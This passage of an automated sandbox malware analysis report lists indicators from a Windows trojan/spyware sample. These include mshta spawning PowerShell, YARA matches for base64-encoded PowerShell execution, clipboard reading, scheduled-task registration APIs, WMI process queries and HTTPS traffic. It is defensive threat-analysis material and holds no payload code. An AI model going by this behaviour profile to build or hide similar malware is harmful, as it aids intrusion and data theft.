                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www2.hm.com/en_us/cart
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                    Source: unknownHTTPS traffic detected: 172.67.223.7:443 -> 192.168.11.20:49754 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.37.173:443 -> 192.168.11.20:49755 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49756 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49757 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49770 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49771 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49772 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49773 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49774 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49775 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49776 version: TLS 1.2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,8_2_004329C0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,8_2_004329C0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041B2E0 CreateDesktopW,8_2_0041B2E0

                    System Summary

                    barindex
                    Source: Process Memory Space: powershell.exe PID: 2576, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 8336, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C9F758 NtResumeThread,6_2_06C9F758
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C9F750 NtResumeThread,6_2_06C9F750
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_009480503_2_00948050
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_009489203_2_00948920
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00947D083_2_00947D08
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_006B7D306_2_006B7D30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_006B46406_2_006B4640
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_006B46506_2_006B4650
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_006B46076_2_006B4607
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_006BB7E86_2_006BB7E8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0093A6036_2_0093A603
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0093761E6_2_0093761E
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_009376286_2_00937628
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0093E7086_2_0093E708
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_009338F86_2_009338F8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_009338E86_2_009338E8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00938BED6_2_00938BED
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00938CCB6_2_00938CCB
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00933E906_2_00933E90
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00933E806_2_00933E80
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00E0B1806_2_00E0B180
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C315F06_2_06C315F0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C327F86_2_06C327F8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C319176_2_06C31917
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C797A86_2_06C797A8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C773B06_2_06C773B0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C762C06_2_06C762C0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C762B16_2_06C762B1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C7F3F06_2_06C7F3F0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C7C7F86_2_06C7C7F8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C797996_2_06C79799
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C773A06_2_06C773A0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C7B8A86_2_06C7B8A8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C718B06_2_06C718B0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C7B8B86_2_06C7B8B8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C775746_2_06C77574
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C900406_2_06C90040
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C900066_2_06C90006
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C979186_2_06C97918
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C979286_2_06C97928
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E667B86_2_06E667B8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E673286_2_06E67328
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E66A306_2_06E66A30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E676396_2_06E67639
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E667A86_2_06E667A8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E66B556_2_06E66B55
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E668756_2_06E66875
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E600406_2_06E60040
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E660206_2_06E66020
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E6683A6_2_06E6683A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E600066_2_06E60006
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E678006_2_06E67800
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E660106_2_06E66010
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E66D216_2_06E66D21
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_082E00226_2_082E0022
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_082E00406_2_082E0040
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_082EF6B06_2_082EF6B0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004088508_2_00408850
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004238608_2_00423860
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004388108_2_00438810
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004218A08_2_004218A0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042DA538_2_0042DA53
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041B2E08_2_0041B2E0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040ACF08_2_0040ACF0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00417DEE8_2_00417DEE
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00437DF08_2_00437DF0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004095808_2_00409580
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041759F8_2_0041759F
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043AEC08_2_0043AEC0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004266D08_2_004266D0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041E7C08_2_0041E7C0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004157998_2_00415799
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041682D8_2_0041682D
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004288CB8_2_004288CB
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043D8808_2_0043D880
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004309408_2_00430940
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004039708_2_00403970
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004209398_2_00420939
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004179C18_2_004179C1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004231C28_2_004231C2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004241C08_2_004241C0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043B1D08_2_0043B1D0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004291DD8_2_004291DD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043D9808_2_0043D980
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004059908_2_00405990
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004221908_2_00422190
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043D9978_2_0043D997
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043D9998_2_0043D999
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004091B08_2_004091B0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042CA498_2_0042CA49
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004162638_2_00416263
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040EA108_2_0040EA10
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004152208_2_00415220
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042CAD08_2_0042CAD0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004252DD8_2_004252DD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004062808_2_00406280
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043DA808_2_0043DA80
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041E2908_2_0041E290
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041CB408_2_0041CB40
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043D34D8_2_0043D34D
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00426B508_2_00426B50
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043DB608_2_0043DB60
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00436B088_2_00436B08
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042830D8_2_0042830D
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042CB118_2_0042CB11
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004043208_2_00404320
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042CB228_2_0042CB22
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004253278_2_00425327
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004083308_2_00408330
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043F3308_2_0043F330
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042A33F8_2_0042A33F
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040DBD98_2_0040DBD9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004243808_2_00424380
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041FC758_2_0041FC75
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041DC008_2_0041DC00
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00429C2B8_2_00429C2B
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004291DD8_2_004291DD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004074F08_2_004074F0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041148F8_2_0041148F
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042AC908_2_0042AC90
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043ECA08_2_0043ECA0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040CD468_2_0040CD46
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004375008_2_00437500
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004225108_2_00422510
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00425E708_2_00425E70
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00436E748_2_00436E74
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004276038_2_00427603
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00425E308_2_00425E30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004286C08_2_004286C0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004236E28_2_004236E2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00405EE08_2_00405EE0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041DE808_2_0041DE80
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00402F508_2_00402F50
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00420F508_2_00420F50
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00438F598_2_00438F59
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004067108_2_00406710
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00423F208_2_00423F20
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043F7208_2_0043F720
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00419F308_2_00419F30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004197C28_2_004197C2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042DFE98_2_0042DFE9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040A7808_2_0040A780
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00411F908_2_00411F90
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004187928_2_00418792
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043EFB08_2_0043EFB0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00408030 appears 42 times
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00414400 appears 65 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 3792
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 3792Jump to behavior
                    Source: Process Memory Space: powershell.exe PID: 2576, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 8336, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 6.2.powershell.exe.7590000.1.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 6.2.powershell.exe.7590000.1.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 6.2.powershell.exe.7590000.1.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 6.2.powershell.exe.7590000.1.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: classification engineClassification label: mal100.troj.spyw.evad.win@26/9@5/7
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00437DF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,8_2_00437DF0
                    Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:304:WilStaging_02
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8344:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8344:304:WilStaging_02
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:304:WilStaging_02
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Ruiexf
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvoifloc.let.ps1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
